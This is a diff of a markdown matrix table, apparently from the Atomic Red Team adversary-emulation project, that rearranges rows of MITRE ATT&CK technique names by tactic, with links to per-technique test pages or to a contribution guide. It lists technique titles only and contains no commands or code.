-| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Unsecured Credentials](../../T1552/T1552.md) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-| | | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
-| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Password Policy Discovery](../../T1201/T1201.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [System Location Discovery](../../T1614/T1614.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [System Time Discovery](../../T1124/T1124.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
